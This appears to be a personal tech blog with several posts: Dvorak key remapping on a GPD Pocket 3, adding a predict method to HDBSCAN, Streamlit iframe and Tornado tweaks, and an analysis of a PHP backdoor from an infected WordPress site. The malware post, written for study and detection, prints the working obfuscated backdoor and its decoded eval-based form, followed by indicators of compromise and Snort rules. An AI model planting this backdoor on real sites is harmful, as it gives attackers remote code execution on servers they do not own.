Remapping the GPD Pocket 3 keyboard for Dvorak using XKB

If you’re used to the Dvorak keyboard layout, you might have a hard time using the GPD Pocket 3. In a QWERTY layout the ; is to the right of the L. GPD moved this to the right of the spacebar on the Pocket 3. The location of the ; is used for the letter s in the Dvorak layout. That means a very frequently used letter is no longer on the home row, defeating the purpose of the Dvorak layout quite a bit.

This was done on Ubuntu 24.04. Your experience on other Linux distributions might vary.

I found the following remapping quite easy to get used to:

  • Enter becomes the letter S
  • Backspace is the new Enter
  • Delete is now backspace
  • Shift + Delete is the delete action

(Although not related to the GPD Pocket 3 specifically I also remapped Caps Lock to Control.)

Note that these changes are applied on top of simply switching to the Dvorak layout:

Original layout Changes on top of setting the layout to Dvorak

In practice this results in the following changes to the file /usr/share/X11/xkb/symbols/pc config flle.

--- pc.bak	2024-05-14 08:04:51.859190653 +0200
+++ pc	2024-05-14 08:54:16.902085341 +0200
@@ -4,11 +4,11 @@
 
     key  <ESC> {[  Escape  ]};
     key  <TAB> {[  Tab,  ISO_Left_Tab  ]};
-    key <CAPS> {[  Caps_Lock  ]};
+    key <CAPS> {[  Control_R  ]};
 
-    key <BKSP> {[  BackSpace,  BackSpace  ]};
+    key <BKSP> {[  Return  ]};
     key <BKSL> {[  backslash,  bar  ]};
-    key <RTRN> {[  Return  ]};
+    key <RTRN> {[  s, S  ]};
 
     // The extra key on many European keyboards:
     key <LSGT> {[  less,  greater,    bar,  brokenbar  ]};
@@ -59,7 +59,7 @@
     key <PAUS> {[  Pause,  Break  ], type="PC_CONTROL_LEVEL2" };
 
     key  <INS> {[  Insert  ]};
-    key <DELE> {[  Delete  ]};
+    key <DELE> {[  BackSpace, Delete  ]};
     key <HOME> {[  Home    ]};
     key  <END> {[  End     ]};
     key <PGUP> {[  Prior   ]};

Note that this configuration only takes effect in X. Your remap does not apply yet for example when booting and unlocking the full disk encryption.

The configuration change also does not survive some updates, so you might need to restore it from time to time.

It might be better to achieve the same results with xmodmap. I have not yet done this successfully though. If my current solution of modifying the XKB config gives problems, I might try xmodmap next.

Sneakily giving HDBSCAN a predict method

Most common implementations of the HDBSCAN clustering algorithm don’t have a predict method. There are some fundamental reasons that many implementations don’t have it. These reasons mostly boil down to the following: Introducing a new data point might change the clustering.

But depending on your use case, it can be valid to want or need a predict method anyway. For example you could be using scikit learn pipelines, that expect a predict method for the last transformer. Or you might be sure that the samples you want to cluster look a lot like your training data. Maybe the samples you offer to the predict method are even drawn from the data you fitted the clusterer on.

For all those use cases the people maintaining the hdbscan package have invented the approximate_predict utility. We could move the functionality in this method to the predict method of the HDBSCAN class. Because not all implementations have something like this method, here I’ll assume the hdbscan package is being used.

The code below shows how to monkey patch a predict method on an instance of HDBSCAN:

from hdbscan import HDBSCAN
from hdbscan.prediction import approximate_predict
from sklearn.datasets import make_blobs

# Generate some sample data to cluster
blobs, _ = make_blobs(
    n_samples=750,
    centers=[[1, 1], [-1, -1], [1.5, -1.5]],
    cluster_std=[0.4, 0.1, 0.75],
    random_state=0,
)

# Instantiate HDBSCAN with prediction_data=True so approximate_predict will work
clusterer = HDBSCAN(prediction_data=True)

# Monkey patch the approximate_predict method as predict method on the instance
clusterer.predict = lambda x: approximate_predict(clusterer, x)[0]

# Now the predict method is available
fitted = list(clusterer.fit_predict(blobs))
predicted = list(clusterer.predict(blobs))
assert fitted == predicted

Alternatively you could subclass the HDBSCAN class. Since scikit learn does not accept varargs for init methods of estimators, this gets verbose:

from hdbscan import HDBSCAN
from hdbscan.prediction import approximate_predict
from joblib import Memory


class HDBSCANWithPredict(HDBSCAN):

    def __init__(self,
                 min_cluster_size=5,
                 min_samples=None,
                 cluster_selection_epsilon=0.0,
                 max_cluster_size=0,
                 metric="euclidean",
                 alpha=1.0,
                 p=None,
                 algorithm="best",
                 leaf_size=40,
                 memory=Memory(None, verbose=0),
                 approx_min_span_tree=True,
                 gen_min_span_tree=False,
                 core_dist_n_jobs=4,
                 cluster_selection_method="eom",
                 allow_single_cluster=False,
                 prediction_data=True,  # changed from the reference implementation
                 match_reference_implementation=False,
                 **kwargs):
        super().__init__(min_cluster_size=min_cluster_size,
                         min_samples=min_samples,
                         cluster_selection_epsilon=cluster_selection_epsilon,
                         max_cluster_size=max_cluster_size,
                         metric=metric,
                         alpha=alpha,
                         p=p,
                         algorithm=algorithm,
                         leaf_size=leaf_size,
                         memory=memory,
                         approx_min_span_tree=approx_min_span_tree,
                         gen_min_span_tree=gen_min_span_tree,
                         core_dist_n_jobs=core_dist_n_jobs,
                         cluster_selection_method=cluster_selection_method,
                         allow_single_cluster=allow_single_cluster,
                         prediction_data=prediction_data,
                         match_reference_implementation=match_reference_implementation,
                         **kwargs)

    def predict(self, points_to_predict):
        return approximate_predict(self, points_to_predict=points_to_predict)[0]

Whether you choose the monkey-patching or the subclassing approach, you now have a predict method available.

Even though inference is now possible for new points, it’s best to keep monitoring the performance of this clusterer. Out-of-cluster samples can be recognised by a label of -1. A dead giveaway that your trained clusterer is no longer appropriate is when the fraction of out-of-cluster samples is:

  • a lot higher than in the training set
  • rising over time because of changing data

If the inference is no longer acceptable you should re-fit HDBSCAN.

Adding custom HTML and Javascript to Streamlit

Streamlit has an API to add custom HTML to your document, but the added HTML will be nested in an iframe. Since the policies on this iframe are quite relaxed, you can use window.parent to escape to the parent document. This can be useful if you want access to elements on the top-level DOM.

Using the following code, the HTML added will lift itself out of its containing iframe:

from streamlit.components.v1 import html

html_contents = """
<script id="extractorScript">
    let currentScript = document.getElementById('extractorScript');
    window.parent.document.querySelector('iframe').insertAdjacentElement(currentScript.nextSibling);
    // window.parent.document.querySelector('iframe').remove();
</script>
<div>
    <h1>Test contents</h1>
    <p>The HTML contents that you want to move out of its iframe</p>
</div>
"""

html(html_contents)

Prepending the contents of the script tag to your HTML tag (a div in this case) allows it to find the content that needs to be lifted with the .nextSibling attribute.

If you’re planning to use this code snippet more than one time, you will have multiple iframe elements. In that case it’s wise to come up with a more specific CSS selector than 'iframe'.

Adding a custom Tornado handler to a streamlit project

Streamlit uses the Tornado web framework under the hood. All traffic generated by Streamlit originates from Tornado handlers.

Streamlit doesn’t expose much of the Tornado API. In this post I’ll show how you can use it anyway, to add custom handlers, while still enjoying most of the conveniences provided by Streamlit.

The streamlit run start is replaced by code that starts the Tornado server. I build on top of my experiences in this previous post: Adding “a main” to a streamlit dashboard

By subclassing Streamlit’s default Server class, we can modify the routes just before we start the Tornado application. After running the typical setup (Server._create_app()), we add a new routing rule. Since this is appended to the end, and the rule before is set so it matches everything, we need to reverse the order the rules are checked. First the newly added specific rule should be checked, and only after that the default Streamlit routes.

import asyncio

import streamlit.web.bootstrap
from streamlit import config
from streamlit.web.server import Server
from streamlit.web.server.media_file_handler import MediaFileHandler
from streamlit.web.server.server import start_listening
from streamlit.web.server.server_util import make_url_path_regex


streamlit.markdown("# Contents of the streamlit app go here as usual")


class CustomHandler(MediaFileHandler):
    def get_content(self, abspath, start=None, end=None):
        # Implement a custom handler here
        return b''


class CustomServer(Server):
    async def start(self):
        # Override the start of the Tornado server, so we can add custom handlers
        app = self._create_app()

        # Add a new handler
        app.default_router.add_rules([(
                make_url_path_regex(config.get_option("server.baseUrlPath"),
                                    f"custom/(.*)"),
                CustomHandler,
                {"path": ""},
            ),
        ])

        # Our new rules go before the rule matching everything, reverse the list
        app.default_router.rules = list(reversed(app.default_router.rules))

        start_listening(app)
        await self._runtime.start()


if __name__ == '__main__':
    if '__streamlitmagic__' not in locals():
        # Code adapted from bootstrap.py in streamlit
        streamlit.web.bootstrap._fix_sys_path(__file__)
        streamlit.web.bootstrap._fix_tornado_crash()
        streamlit.web.bootstrap._fix_sys_argv(__file__, [])
        streamlit.web.bootstrap._fix_pydeck_mapbox_api_warning()
        streamlit.web.bootstrap._fix_pydantic_duplicate_validators_error()
        streamlit.web.bootstrap._install_pages_watcher(__file__)

        server = CustomServer(__file__, is_hello=False)

        async def run_server():
            await server.start()
            streamlit.web.bootstrap._on_server_start(server)
            streamlit.web.bootstrap._set_up_signal_handler(server)
            await server.stopped

        asyncio.run(run_server())

There’s also a way to replace the default Streamlit routes. In a next post I’ll show how to do that, to prevent unauthorized access to the media assets served by your app.

Looking at PHP backdoor malware

Last week I helped out with a Wordpress website that had been infected. The webhosting company detected some malware, but there was more malware that wasn’t detected yet. In this post I’m looking at that malware sample. This PHP file was probably uploaded using a vulnerability in a Wordpress plugin.

The malicious code looked like this:

<?php


function asdasd0()
{
	echo 11111;
}

$i="Hq8%01%28ao%2A%2C%1D%3D%3E%07%2B%3CA%7F%09%17%18%2A%01%0B%0D%1B%29oEx%220%26%09Zol%7E%0E%21%0713%16%0F1%5Bs%0D%1B%29%17%0C%2A%1E%0A%186TxADgsdR%2C%0C%04%2C%2C%27%04%00fo%049%14%3A%0F%3D%167%14%00%27%27%07%07%18%0C%07+TxADgsdR%2C%16%0F1%2C+%08%19%2B%17%051%01%0C%1EmC%7DZyDEcUf%03%1F%2B%10+%08%1B+h%1A0%08%15Ba%175%15%15bhM3%09%1CCHy%2Fl%7EnhIxH%0A%1F1%2C0%00%00%2FhTxNGQHytATn.%06%2ALMN%2CSiADuhM1LYJ6%07%26%0D%11+%60M%3C%0D%11%0BlH%7DA%0FCBIxLEJeSt%07%1B%3ChA%7C%06EWeCoAP%24hUx%1F%11%18%29%16%3AIP%25-%10qLCLeW%3DAHn%3B%1D%2A%00%00%04mW0%00%00%2FaRxH%0FAn_tE%1Dec%40x%17h%60eStATnhIxLEJa%1C%21%15%2B%2A%29%1D9LKWe%10%3C%13%5C%21%3A%0DpH%01%0B1%12%0FE%1D%13aI%06L%0A%18%21%5Bp%0A%117%13M21LC%7E%7E%5EATnhIxLE%17HytATn5dRLEJe%011%15%01%3C%26I%7C%03%10%1E%1A%175%15%15uEc%25ao%03%23S%7C%08%07%3D-%1DpH%3A-%00%27%0FWC%7D%7CZm1LCHy%2Fl%7EnhIx%08%0C%0Fm%1E0T%5Cz%7F%5Ei%5ELC%7E%7E%5E%1CyDl%1D%3D%01%15W%24%01%26%00%0D%11%25%0C%2A%0B%00Ba%2C%17.%3B%05%01%2CtLA5%15%3C%075%5DuEc%3E%03%17%0F%24%10%3CA%5Cj%3C%0C5%1CE%0B6Sp%05%15%3A%2963%09%1CJxMtE%10%2F%3C%08qL%1EgOStATj%2C%08%2C%0DEWe3%21%0F%07%2B%3A%009%00%0C%10+%5B%27%09%10%3E%60%1A0%08%15B%27%12%27%04Bz%17%0D%3D%0F%0A%0E+%5Bp%05%15%3A%29%40tLB%106GfQ%1A%2A%3D%07%3D%5B%02%1A%2BB%3C%16%03%28%2F%03%3E%5D%11%10pA%3C%0A%12%29%24%04%2CZBCiSp%05%15%3A%2963%09%1CClHYkTnhI1%0AEB%2C%00%27%04%00fl%0D9%18%041b%12%3FF%29gaI%23aoJeStATnh%00%3ELMN%21%12+%00%2Fi%29N%05LXWeT%3DF%5Dn3dRLEJeStATnhIxH%0CJxS5%13%06%2F1AUfEJeStATnhIxLEJeSs%11%02ihTfL%25%1A-%03%22%04%06%3D%21%066DLFHytATnhIxLEJeStATno%1A.KEW%7BSsPZ%7EeX%7F%40h%60eStATnhIxLEJlHYkTnhIxLEJeStA%11-+%06x%2C%16%0F7%1A5%0D%1D4-A%7C%05LQHytATnhIxL%18J+%1F%27%04%1D%28hA%7C%08%04%1E%24%28s%00S%13hTeLB%0FbZt%1AyDhIxLEJeStATn-%1F9%00MN%21%12+%00%2Fi%2CN%05E%5EgOStATnhIx%11h%60eStATnhI%3D%14%0C%1EmZol%7EnhIx%11h%608";
$j="%12%27%24%0C%07%1C%10%1E%1A%10%3B%0F%00%2B%26%1D%2B";

$eByjoghUea="tNHiXlejEsTa";

function vksXJAdk($Vsgjyqji, $unvnBFtDiJlf)
{
$Vsgjyqji = urldecode($Vsgjyqji);
$TTlBSYU = str_split($Vsgjyqji);
$action = "";
for ($i = 0; $i < strlen($Vsgjyqji);$i++) {
$action .= $TTlBSYU[$i] ^ $unvnBFtDiJlf[$i%12];
}
return $action;
}

$k = vksXJAdk($i, $eByjoghUea);

function asdasd1()
{
	echo 11111;
}


$f = vksXJAdk($j, $eByjoghUea);
$f($eByjoghUea, $k);

function asdasd2()
{
	echo 11111;
}

include_once ($eByjoghUea);

function asdasd3()
{
	echo 11111;
}

unlink($eByjoghUea);

function asdasd4()
{
	echo 11111;
}

exit();

There’s clearly some obfuscation going on. The asdasd functions don’t have a role in the obfuscation. I suspect they are there to decrease the entropy of the file as a whole. This helps avoid detection, since scanning software uses high entropy as an indication that some obfuscation, compression or encryption is being used.

After deobfuscation (running it and setting a breakpoint to inspect the contents of $k), the code looked like this:

<?php
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);


function shdp($data, $key)
{
    $out_data = "";
    for ($i = 0; $i < strlen($data);) {
        for ($j = 0; $j < strlen($key) && $i < strlen($data); $j++, $i++) {
            $out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
        }
    }
    return $out_data;
}
if (isset($_GET[673435]))
{
    die(md5(47712));
}
$temp=array_merge($_COOKIE, $_POST);
foreach ($temp as $data_key => $data) {
    $data = @unserialize(shdp(shdp(base64_decode($data), 'zs420ndune7gpn1hwwfgjf1tz52hkfglmt6'), $data_key));
    if (isset($data['ak'])) {
        if ($data['a'] == 'i') {
            $i = array(
                'pv' => @phpversion(),
                'sv' => '1.0-1',
            );
            echo @serialize($i);
        } elseif ($data['a'] == 'e') {
            eval($data['d']);
        }
        exit();
    }
}

This code gets executed by putting it in a file, running it with include_once, and deleting the file afterwards (unlink). $f contains the string file_put_contents to do so.

Reading this code, we can find a few Indicators Of Compromise (IOC):

  • 673435 is used as a GET parameter. The value is ignored. (Other variations use 47712 as a GET parameter)
  • 6a59bb58c6c03d5103d44f3b7e5ebf07, the MD5 hash of 47712 is a response when this GET parameter is supplied.
  • Base64 encoded cookie or POST data is supplied to the script. Note that there are also many legitimate use cases for doing this, making it easier to blend in with normal traffic. In addition, cookie values and POST data is also less likely to end up in access logs (contrary to GET parameters), which also helps evade detection.

Of course there’s nothing preventing the attacker from changing the constant 673435 (again). My best guess is that this GET parameter can be used to demonstrate a host is compromised. Speculating a bit: this could allow for selling access to the host to others, because this check could be done without knowing the password. The buyer of the access could verify that a URL like https://example.com/wp-content/uploads/malware.php?673435=anything returns 6a59bb58c6c03d5103d44f3b7e5ebf07, before paying for the access.

Only with the password: (zs420ndune7gpn1hwwfgjf1tz52hkfglmt6 in this sample) can the host be used to evaluate arbitrary code. The password varies across the many samples I looked at. It is most likely unique per target. The password is used to decrypt the instructions (that are supplied either in cookies or in POST data). The encryption used is a repeating XOR cipher.

After the data has been demangled, it can contain two instructions. The type of instruction is encoded in the a key.

  • i: return information about the host (backdoor version (1.0-1) and PHP version)
  • e: evaluates PHP code (the code itself is in the d key)

I was curious whether more about this malware was known, so I started looking for earlier detections. I found this StackExchange post from 2018 where someone posts some similar malware with the i and e commands.

Searching Github led me to a useful resource on this strain of PHP malware, the repository bediger4000/php-malware-analysis. This repository contained many different variations collected by Wordpress honeypots, going by the following aliases:

Since the two numeric GET parameters can be converted to a snort rule, I decided to submit these to the snort-sigs mailing list:

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"SERVER-WEBAPP PHP backdoor check of successful installation using GET parameter 47712"; flow:to_server,established; content:"GET /"; http_uri; content:"47712="; http_uri; classtype:web-application-activity; reference:url,bartbroere.eu/2023/12/31/php-backdoor-malware/; sid:1000001;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"SERVER-WEBAPP PHP backdoor check of successful installation using GET parameter 673435"; flow:to_server,established; content:"GET /"; http_uri; content:"673435="; http_uri; classtype:web-application-activity; reference:url,bartbroere.eu/2023/12/31/php-backdoor-malware/; sid:1000002;)

alert tcp $HOME_NET $HTTP_PORTS -> $EXTERNAL_NET any (msg:"SERVER-WEBAPP Indication of a successful PHP backdoor check, server responds with 6a59bb58c6c03d5103d44f3b7e5ebf07"; flow:to_client,established; content:"6a59bb58c6c03d5103d44f3b7e5ebf07"; http_client_body; reference:url,bartbroere.eu/2023/12/31/php-backdoor-malware/; sid:1000003;)

To decrease false positives, you could for example require that .php is in the path. An even better way to decrease false positives would be only raising an alert when rule 1 or 2 and rule 3 are activated. Snort’s activates and activated_by offer this functionality. This could be useful if you are monitoring an application where 673435 and 47712 are legitimate GET parameters, or the MD5 hash of 47712 is a valid server response.

Update: The PHP backdoor signatures have been improved and are now part of the Open Emerging Threats rules, available for download here